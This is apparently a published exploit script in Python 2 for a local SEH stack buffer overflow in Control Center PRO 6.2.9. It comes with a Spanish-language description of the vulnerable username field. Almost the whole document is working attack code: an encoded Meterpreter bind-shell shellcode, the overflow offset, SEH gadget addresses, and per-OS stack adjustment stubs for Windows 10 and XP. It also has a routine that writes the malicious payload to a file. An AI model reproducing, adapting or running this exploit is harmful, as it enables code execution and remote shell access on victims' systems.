1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148 | # Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
# Date: 2019-11-09
# Exploit Author: Samir sanchez garnica @sasaga92
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
# Version: 6.2.9
# Tested: Windows 10 pro N and Windows XP SP3
# CVE : N/A
#!/usr/bin/python
'''
Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad
considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH)
'''
import sys
import random
import string
import struct
import argparse
def pattern_create(_type,_length):
_type = _type.split(" ")
if _type[0] == "trash":
return _type[1] * _length
elif _type[0] == "random":
return ''.join(random.choice(string.lowercase) for i in range(_length))
elif _type[0] == "pattern":
_pattern = ''
_parts = ['A', 'a', '0']
while len(_pattern) != _length:
_pattern += _parts[len(_pattern) % 3]
if len(_pattern) % 3 == 0:
_parts[2] = chr(ord(_parts[2]) + 1)
if _parts[2] > '9':
_parts[2] = '0'
_parts[1] = chr(ord(_parts[1]) + 1)
if _parts[1] > 'z':
_parts[1] = 'a'
_parts[0] = chr(ord(_parts[0]) + 1)
if _parts[0] > 'Z':
_parts[0] = 'A'
return _pattern
else:
return "Not Found"
def generate_file(_name_file, _payload):
print _payload
print "[+] Creando Archivo malicioso"
_name_file = open(_name_file,"w+")
_name_file.write(_payload)
_name_file.close()
print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))
def main():
_parser = argparse.ArgumentParser()
_parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
_args = _parser.parse_args()
#badchars 0x0a, 0x0d, >= 0x80
_name_exploit = "ControlCenterPRO_v6_2_9.txt"
#sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
_shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
"\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
"\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
"\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
"\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
"\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
"\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
"\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
"\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
"\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
"\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
"\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
"\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
"\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
"\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
"\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
"\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
"\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
"\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
"\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
"\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
"\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
"\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
"\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
"\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
"\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
"\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
"\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
"\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
"\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
"\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
"\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
"\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
"\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
"\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
"\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
"\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
"\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
"\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
"\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
"\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
"\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
"\x53\x41\x41")
_offset = 664
_padding = 40000
_nseh = "\x42\x42\x77\x08"
_seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii
if _args.os.lower() == "win10":
_esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
elif _args.os.lower() == "winxp":
_esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += "A" * 16
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
else:
print("[-] os select is not support, select win10 or winxp")
generate_file(_name_exploit, _inject)
if __name__ == "__main__":
main()
|